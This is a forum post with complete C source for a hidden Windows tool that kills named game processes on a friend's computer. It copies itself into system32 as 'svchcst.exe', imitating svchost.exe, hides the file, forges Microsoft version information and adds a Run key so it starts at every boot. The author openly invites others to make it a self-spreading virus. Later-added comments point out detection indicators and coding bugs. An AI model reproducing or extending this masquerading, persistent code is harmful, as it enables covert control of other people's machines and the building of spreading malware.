前去評論:http://topic.csdn.net/u/20080315/14/e6ca9321-09c0-40c7-9661-9ed1a25be17f.html
朋友總用我的電腦打遊戲,我就寫了個這東西,嘿嘿
希望有高手能把這東西做成病毒,讓它自動傳播,已減少遊戲危害。
注意:軟體行為類似病毒,運作無界面,無任何提示,需手動删除(先結束svchcst.exe程序,再删除下述檔案與Run項下的SuQiEr值)。
說明:
遊戲防沉迷軟體
完成時間:2008年3月15日
運作平台:win32
編譯環境:devc++ windowsxp-sp2
連接配接庫:libpsapi.lib
功能描述:開機啟動,監測程序,清除程序以防止指定程式啟動。
執行後系統改動:
1:建立檔案C:/WINDOWS/system32/svchcst.exe(系統+隐藏屬性)
3:添加系統資料庫(登錄檔)項HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Run
值名稱:SuQiEr
值資料:C:/WINDOWS/system32/svchcst.exe
程式流程較長的描述:
啟動程式
if(檔案所在位置不為C:/WINDOWS/system32/svchcst.exe)
{
複制檔案到C:/WINDOWS/system32/svchcst.exe
修改檔案C:/WINDOWS/system32/svchcst.exe屬性為隐藏+系統
寫入系統資料庫,以實作開機自動啟動svchcst.exe
}
STRKILL:掃描程序,查找指定程序名并傳回該程序pid
結束指定程序,程式停止1800秒,跳轉至STRKILL
---------------makefile:
# Project: svchcst
# Makefile created by Dev-C++ 4.9.9.2
# Builds main.c plus a compiled resource script into kill.exe with the MinGW toolchain.
# NOTE(review): the recipe lines in this listing carry no leading tab; presumably lost
# when the page was extracted.
CPP = g++.exe
CC = gcc.exe
WINDRES = windres.exe
# Compiled resource built from kill_private.rc (not shown on this page); presumably it
# consumes the version strings from KILL_PRIVATE_H - confirm against the .rc file.
RES = kill_private.res
OBJ = main.o $(RES)
LINKOBJ = main.o $(RES)
# -mwindows links for the GUI subsystem, so no console window appears at run time.
# libpsapi.a provides the process-enumeration functions that main.c calls.
LIBS = -L"d:/Dev-Cpp/lib" -mwindows D:/Dev-Cpp/lib/libpsapi.a -fmessage-length=0
INCS = -I"d:/Dev-Cpp/include"
CXXINCS = -I"d:/Dev-Cpp/lib/gcc/mingw32/3.4.2/include" -I"d:/Dev-Cpp/include/c++/3.4.2/backward" -I"d:/Dev-Cpp/include/c++/3.4.2/mingw32" -I"d:/Dev-Cpp/include/c++/3.4.2" -I"d:/Dev-Cpp/include"
# The build output is kill.exe; the on-disk name svchcst.exe only appears once the
# program has copied itself to the path in KILLDIR (see main.c).
BIN = kill.exe
CXXFLAGS = $(CXXINCS) -ansi -fmessage-length=0
CFLAGS = $(INCS) -ansi -fmessage-length=0
RM = rm -f
.PHONY: all all-before all-after clean clean-custom
all: all-before kill.exe all-after
clean: clean-custom
${RM} $(OBJ) $(BIN)
$(BIN): $(OBJ)
$(CC) $(LINKOBJ) -o "kill.exe" $(LIBS)
main.o: main.c
$(CC) -c main.c -o main.o $(CFLAGS)
# Embeds the version resource in COFF form so it can be linked into the executable.
kill_private.res: kill_private.rc
$(WINDRES) -i kill_private.rc --input-format=rc -o kill_private.res -O coff
----------KILL_PRIVATE_H(版本與版權資訊)
/*
 * Version and copyright strings for the executable's version resource
 * (presumably referenced by kill_private.rc, which is not shown here).
 *
 * Every value is self-declared by the author. The company, description and
 * version strings copy the look of the Windows XP SP2 service host, while
 * ORIGINAL_FILENAME differs from "svchost.exe" by one letter.
 *
 * Defender note: version-resource fields are not authenticated. A file that
 * claims "Microsoft Corporation" here but carries no valid Microsoft
 * signature, or whose name is a near-miss of a system binary, is a
 * masquerading indicator worth alerting on.
 */
#ifndef KILL_PRIVATE_H
#define KILL_PRIVATE_H
/* Version number, as one string and as its four numeric components. */
#define VER_STRING "5.1.2600.2180"
#define VER_MAJOR 5
#define VER_MINOR 1
#define VER_RELEASE 2600
#define VER_BUILD 2180
/* Publisher and description shown in the file's properties dialog. */
#define COMPANY_NAME "Microsoft Corporation"
#define FILE_VERSION "5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)"
#define FILE_DESCRIPTION "Generic Host Process for Win32 Services"
#define INTERNAL_NAME ""
#define LEGAL_COPYRIGHT "Microsoft Corporation. All rights reserved."
#define LEGAL_TRADEMARKS ""
/* Matches the installed file name used in main.c (KILLDIR), not the build output kill.exe. */
#define ORIGINAL_FILENAME "svchcst.exe"
#define PRODUCT_NAME "Microsoft Windows Operating System"
#define PRODUCT_VERSION ""
#endif
----------main.c主功能代碼
#include <windows.h>
#include <stdio.h>
#include <PSAPI.H>
#include <time.h>
/*
 * Comma-separated list of executable base names to look for. It expands
 * inside the array initialiser of pszProcessName in WinMain.
 */
#define GAMENAME "cs.exe","Wow.exe","war3.exe"
/*
 * Pause between scans. It is multiplied by 1000 at the call site; the
 * page's description gives the pause as 1800 seconds.
 */
#define PLAYTIME 1800
/*
 * Path the program installs itself to and registers for autostart.
 * Defender note: the file name imitates svchost.exe with one letter changed,
 * and it sits in the system directory; both are useful hunting pivots.
 */
#define KILLDIR "C://WINDOWS//system32//svchcst.exe"
/*
 * Adds an autostart entry for KILLDIR under the machine-wide Run key.
 *
 * Opens the Run key beneath HKEY_LOCAL_MACHINE with KEY_WRITE and sets the
 * REG_SZ value "SuQiEr" to the KILLDIR path.
 *
 * Returns 0 on success, 1 if the key could not be opened, 2 if the value
 * could not be written. Note that the declared type is BOOL, so a caller
 * testing the result as a boolean would read both failure codes as "true".
 *
 * Defender note: a Run value whose data points at an unsigned executable in
 * the system directory is a common persistence indicator. Writing under
 * HKEY_LOCAL_MACHINE normally needs administrative rights - TODO confirm for
 * the target Windows version.
 */
BOOL RegisterToAutoRun(void)
{
HKEY hKEY;
long ret;
LPSTR FileCurrentExeName = KILLDIR;
DWORD type=REG_SZ;
DWORD size=MAX_PATH;
LPCTSTR lpValueName="SuQiEr",Rgspath="Software//Microsoft//Windows//CurrentVersion//Run";
ret=RegOpenKeyEx(HKEY_LOCAL_MACHINE,Rgspath,0,KEY_WRITE,&hKEY);
if(ret!=ERROR_SUCCESS)
{
/* NOTE(review): hKEY was never initialised when the open fails, so this
   closes an indeterminate handle value. */
RegCloseKey(hKEY);
return 1;
}
/* NOTE(review): size is MAX_PATH, which is longer than the KILLDIR literal,
   so the call is told to read bytes past the end of the string. */
ret=RegSetValueEx(hKEY,lpValueName,(DWORD)NULL,type,(CONST BYTE *)FileCurrentExeName,size);
if(ret!=ERROR_SUCCESS)
{
RegCloseKey(hKEY);
return 2;
}
RegCloseKey(hKEY);
return 0;
}
/*
 * Collects the process IDs of running processes whose module base name
 * matches one of the given names (case-insensitive).
 *
 * pID            - output array; matching PIDs are stored from index 0 and a
 *                  0 terminator is appended. No capacity is passed in, so the
 *                  caller's array must be large enough for every match plus
 *                  the terminator.
 * pszProcessName - array of name strings; iteration stops at the first empty
 *                  string, so the caller has to supply one.
 *
 * Returns the number of entries written, counting the terminator, or 0 if
 * EnumProcesses fails. In the failure case pID is left untouched, so it still
 * holds whatever an earlier call stored.
 *
 * Defender note: opening every process with PROCESS_ALL_ACCESS is broad and
 * noisy; process-access telemetry would record it.
 */
int getSpecifiedProcessId(DWORD pID[],const char* pszProcessName[])
{
DWORD processId[1024], cbNeeded, dwProcessesCount;
HANDLE hProcess;
HMODULE hMod;
UINT i,j,pidcx=0;
char szProcessName[MAX_PATH] = "UnknownProcess";
/* NOTE(review): sizeof(processId) is already a byte count; multiplying by
   sizeof(DWORD) reports a buffer larger than the array really is. */
DWORD dwArrayInBytes = sizeof(processId)*sizeof(DWORD);
if(!EnumProcesses(processId,dwArrayInBytes,&cbNeeded))
return 0;
dwProcessesCount=cbNeeded/sizeof(DWORD);
for(i=0;i <dwProcessesCount;i++)
{
hProcess = OpenProcess(PROCESS_ALL_ACCESS,FALSE,processId[i]);
if(!hProcess)
{
/* Processes that cannot be opened are skipped silently. */
continue;
}
else
{
/* Only one HMODULE slot is supplied, so only the first module (normally
   the executable itself) is retrieved. */
if(EnumProcessModules(hProcess,&hMod,sizeof(hMod),&cbNeeded))
{
/* The return value is ignored; on failure szProcessName keeps its
   previous contents. */
GetModuleBaseName(hProcess,hMod,szProcessName,sizeof(szProcessName));
for(j=0;*pszProcessName[j];j++)
{
if(!_stricmp(szProcessName,pszProcessName[j]))
{
CloseHandle(hProcess);
pID[pidcx++] = processId[i];
break;
}
}
}
/* NOTE(review): the handle is closed only on a match; handles of
   non-matching processes are not closed inside the loop. */
}
}
/* NOTE(review): this closes whatever hProcess last held, which may be NULL,
   already closed, or unset if the loop never ran. */
CloseHandle(hProcess);
pID[pidcx++] = 0;
return pidcx;
}
/*
 * Copies the running executable to KILLDIR through the shell file-operation
 * API, with confirmation prompts and progress UI suppressed.
 *
 * Returns the SHFileOperation result (0 on success, per that API).
 *
 * Defender note: a process copying its own image into the system directory
 * under a different name is a self-installation pattern that file-creation
 * telemetry can surface.
 */
int myCopyFile(void)
{
SHFILEOPSTRUCT Op = {0};
int rettf=0;
/* The buffer is one byte longer than the size passed below and is
   zero-filled, so the path is followed by an extra NUL. */
char CurrentPath[MAX_PATH+1]= {0};
DWORD size=MAX_PATH;
GetModuleFileName(NULL,CurrentPath,size);
Op.hwnd = NULL;
Op.wFunc = FO_COPY;
Op.pFrom = CurrentPath;
/* NOTE(review): SHFileOperation documents pFrom and pTo as double
   NUL-terminated lists; a plain string literal guarantees only one NUL. */
Op.pTo = KILLDIR;
/* NOTE(review): the separator between the two flags is garbled in this
   listing; presumably a bitwise OR in the original. */
Op.fFlags = FOF_NOCONFIRMATION ¦FOF_SILENT;
rettf = SHFileOperation(&Op);
return rettf;
}
/*
 * Program entry point. Installs the program on first run, then loops forever
 * looking for the configured process names and terminating any matches.
 *
 * The install step (copy to KILLDIR, set attributes, register autostart)
 * runs only when the current image path differs from KILLDIR. None of the
 * install calls' results are checked. The final return is never reached.
 *
 * Defender note: observable artefacts are the file at KILLDIR with
 * system+hidden attributes, the "SuQiEr" Run value, and a windowless process
 * that periodically opens other processes with PROCESS_TERMINATE.
 */
int WINAPI WinMain (HINSTANCE hThisInstance,
HINSTANCE hPrevInstance,
LPSTR lpszArgument,
int nFunsterStil)
{
DWORD pidcx=0;
/* PID output buffer; MAX_PATH is borrowed as its length, and no bound is
   passed to getSpecifiedProcessId. */
DWORD pID[MAX_PATH]={0};
/* NOTE(review): the last entry is presumably meant as the list terminator,
   but as written it is a two-character string, whereas
   getSpecifiedProcessId stops at an empty string. */
const char* pszProcessName[]= {GAMENAME,"/0"};
HANDLE handle1;
char CurrentPath[MAX_PATH]= {0};
DWORD size=MAX_PATH;
int i;
GetModuleFileName(NULL,CurrentPath,size);
/* A non-zero result means the image is not running from KILLDIR. */
if(_stricmp(KILLDIR,CurrentPath))
{
myCopyFile();
/* Marks the installed copy system+archive+hidden so default Explorer
   settings do not list it. */
SetFileAttributes(KILLDIR,FILE_ATTRIBUTE_SYSTEM ¦FILE_ATTRIBUTE_ARCHIVE ¦FILE_ATTRIBUTE_HIDDEN);
RegisterToAutoRun();
}
while(1)
{
/* The return value is stored but never used; the loop below relies on the
   0 terminator in pID instead. */
/* NOTE(review): if the scan fails, pID still holds the previous round's
   PIDs, which may by then belong to unrelated processes. */
pidcx = getSpecifiedProcessId(pID,pszProcessName);
for(i=0;pID[i];i++)
{
handle1=OpenProcess(PROCESS_TERMINATE,FALSE,pID[i]);
if(handle1)
TerminateProcess(handle1,0);
/* NOTE(review): handle1 is never closed, so one handle leaks per
   terminated process. */
}
/* Waits before the next scan; the page's description gives 1800 seconds. */
sleep(PLAYTIME*1000);
}
return 0;
}